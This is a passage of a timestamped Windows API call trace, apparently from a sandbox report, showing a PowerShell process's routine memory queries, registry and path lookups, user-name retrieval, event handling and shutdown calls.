AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.854] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0137.172] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0137.198] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0137.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.198] CoTaskMemFree (pv=0x10c990) [0137.785] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x10cdd0 [0138.187] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.347] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.356] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.357] VirtualQuery (in: lpAddress=0xca200, lpBuffer=0xcb0c0, dwLength=0x30 | out: lpBuffer=0xcb0c0*(BaseAddress=0xca000, 
AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.484] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.484] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.484] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.485] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.485] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.485] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, 
AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, 
AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.488] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.488] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.489] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, 
AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.489] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.489] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.490] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.491] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, 
AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.491] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.496] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.497] CoTaskMemFree (pv=0x10cff0) [0138.515] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.515] CoTaskMemFree (pv=0x10cff0) [0138.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.579] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, 
__alignment2=0x0)) returned 0x30 [0138.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.588] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.588] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.588] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, 
State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.591] CoTaskMemAlloc (cb=0x5a) returned 0x1bd890 [0138.591] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd80c, lpData=0x1bd890, lpcbData=0xcd808*=0x56 | out: lpType=0xcd80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd808*=0x56) returned 0x0 [0138.592] CoTaskMemFree (pv=0x1bd890) [0138.592] RegCloseKey (hKey=0x3a4) returned 0x0 [0138.592] CoTaskMemAlloc (cb=0x5a) returned 0x1bd890 [0138.592] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd80c, lpData=0x1bd890, lpcbData=0xcd808*=0x56 | out: lpType=0xcd80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd808*=0x56) returned 0x0 [0138.592] CoTaskMemFree (pv=0x1bd890) [0138.592] RegCloseKey (hKey=0x3a4) returned 0x0 [0138.593] CoTaskMemAlloc (cb=0x20c) returned 0x1ac580 [0138.593] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ac580 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\Documents") returned 0x0 [0138.594] CoTaskMemFree (pv=0x1ac580) [0138.594] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Documents", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Documents", lpFilePart=0x0) returned 0x21 [0138.594] CoTaskMemAlloc (cb=0x20c) returned 0x1ac580 [0138.594] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ac580 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\Documents") returned 0x0 [0138.595] CoTaskMemFree (pv=0x1ac580) [0138.595] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Documents", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Documents", lpFilePart=0x0) returned 0x21 [0138.597] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, 
nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.597] CoTaskMemFree (pv=0x10cff0) [0138.598] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.598] CoTaskMemFree (pv=0x10cff0) [0138.598] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.598] CoTaskMemFree (pv=0x10cff0) [0138.599] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.599] CoTaskMemFree (pv=0x10cff0) [0138.610] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.610] CoTaskMemFree (pv=0x10cff0) [0138.614] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.614] CoTaskMemFree (pv=0x10cff0) [0138.619] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0138.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcda00 | out: lpMode=0xcda00) returned 1 [0138.621] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.622] CoTaskMemFree (pv=0x10cff0) [0138.625] SetEvent (hEvent=0x394) returned 1 [0138.625] SetEvent (hEvent=0x3a4) returned 1 [0138.625] SetEvent (hEvent=0x370) returned 1 [0138.625] SetEvent (hEvent=0x390) returned 1 [0138.626] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.627] CoTaskMemFree (pv=0x10cff0) [0138.627] 
CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.627] CoTaskMemFree (pv=0x10cff0) [0138.628] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c [0138.630] SetEvent (hEvent=0x39c) returned 1 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x520 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x51c [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f4 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x524 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x52c [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x570 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x540 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x580 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x584 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x588 [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x58c [0149.860] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x590 [0149.860] SetEvent (hEvent=0x524) returned 1 [0149.860] SetEvent (hEvent=0x520) returned 1 [0149.860] SetEvent (hEvent=0x51c) returned 1 [0149.861] SetEvent (hEvent=0x4f4) returned 1 [0149.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x594 [0149.861] SetEvent (hEvent=0x39c) returned 1 
[0149.870] SetEvent (hEvent=0x52c) returned 1 [0149.870] SetEvent (hEvent=0x570) returned 1 [0149.870] SetEvent (hEvent=0x540) returned 1 [0150.235] CoTaskMemAlloc (cb=0x104) returned 0x1b8694a0 [0150.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8694a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.236] CoTaskMemFree (pv=0x1b8694a0) [0151.415] SetEvent (hEvent=0x31c) returned 1 [0151.417] CoTaskMemAlloc (cb=0x804) returned 0x1b86b140 [0151.417] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86b140, nSize=0xcd888 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd888) returned 0x1 [0151.418] CoTaskMemFree (pv=0x1b86b140) [0151.418] CoTaskMemAlloc (cb=0x204) returned 0x14f070 [0151.418] GetUserNameW (in: lpBuffer=0x14f070, pcbBuffer=0xcd8c8 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd8c8) returned 1 [0151.418] CoTaskMemFree (pv=0x14f070) [0151.421] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f5d338*="Stopped", lpRawData=0x2f5d0c8) returned 1 [0151.836] SetEvent (hEvent=0x39c) returned 1 [0151.846] CloseHandle (hObject=0x39c) returned 1 [0151.847] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0151.850] CoGetContextToken (in: pToken=0xcf450 | out: pToken=0xcf450) returned 0x0 [0151.850] CObjectContext::QueryInterface () returned 0x0 [0151.850] CObjectContext::GetCurrentThreadType () returned 0x0 [0151.850] Release () returned 0x0 [0151.852] CoGetContextToken (in: pToken=0xcf020 | out: pToken=0xcf020) returned 0x0 [0151.852] CObjectContext::QueryInterface () returned 0x0 [0151.852] CObjectContext::GetCurrentThreadType () returned 0x0 [0151.852] Release () returned 0x0 [0151.854] CoGetContextToken (in: pToken=0xcf020 | out: pToken=0xcf020) returned 0x0 [0151.854] CObjectContext::QueryInterface () returned 0x0 [0151.854] CObjectContext::GetCurrentThreadType () returned 0x0 [0151.854] Release () returned 0x0 
[0152.462] CoGetContextToken (in: pToken=0xcf020 | out: pToken=0xcf020) returned 0x0 [0152.462] CObjectContext::QueryInterface () returned 0x0 [0152.462] CObjectContext::GetCurrentThreadType () returned 0x0 [0152.462] Release () returned 0x0 [0152.506] CoGetContextToken (in: pToken=0xcf010 | out: pToken=0xcf010) returned 0x0 [0152.506] CObjectContext::QueryInterface () returned 0x0 [0152.506] CObjectContext::GetCurrentThreadType () returned 0x0 [0152.506] Release () returned 0x0 [0152.507] CoUninitialize () Thread: id = 44 os_tid = 0x810 Thread: id = 45 os_tid = 0x4e4 Thread: id = 46 os_tid = 0x768 Thread: id = 47 os_tid = 0x79c Thread: id = 48 os_tid = 0x4d0 [0129.119] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0134.501] LocalFree (hMem=0x11b2e0) returned 0x0 [0134.501] CloseHandle (hObject=0x320) returned 1 [0134.501] CloseHandle (hObject=0x13) returned 1 [0134.502] CloseHandle (hObject=0xf) returned 1 [0134.502] RegCloseKey (hKey=0x30c) returned 0x0 [0134.502] RegCloseKey (hKey=0x308) returned 0x0 [0134.502] RegCloseKey (hKey=0x304) returned 0x0 [0134.502] LocalFree (hMem=0x11b2c0) returned 0x0 [0134.503] RegCloseKey (hKey=0x32c) returned 0x0 [0135.623] RegCloseKey (hKey=0x304) returned 0x0 [0138.219] RegCloseKey (hKey=0x388) returned 0x0 [0138.220] RegCloseKey (hKey=0x384) returned 0x0 [0138.221] RegCloseKey (hKey=0x380) returned 0x0 [0138.221] RegCloseKey (hKey=0x37c) returned 0x0 [0138.221] RegCloseKey (hKey=0x378) returned 0x0 [0138.222] RegCloseKey (hKey=0x374) returned 0x0 [0138.222] RegCloseKey (hKey=0x350) returned 0x0 [0138.222] RegCloseKey (hKey=0x3a0) returned 0x0 [0138.223] RegCloseKey (hKey=0x36c) returned 0x0 [0138.223] RegCloseKey (hKey=0x368) returned 0x0 [0138.224] RegCloseKey (hKey=0x364) returned 0x0 [0138.224] RegCloseKey (hKey=0x360) returned 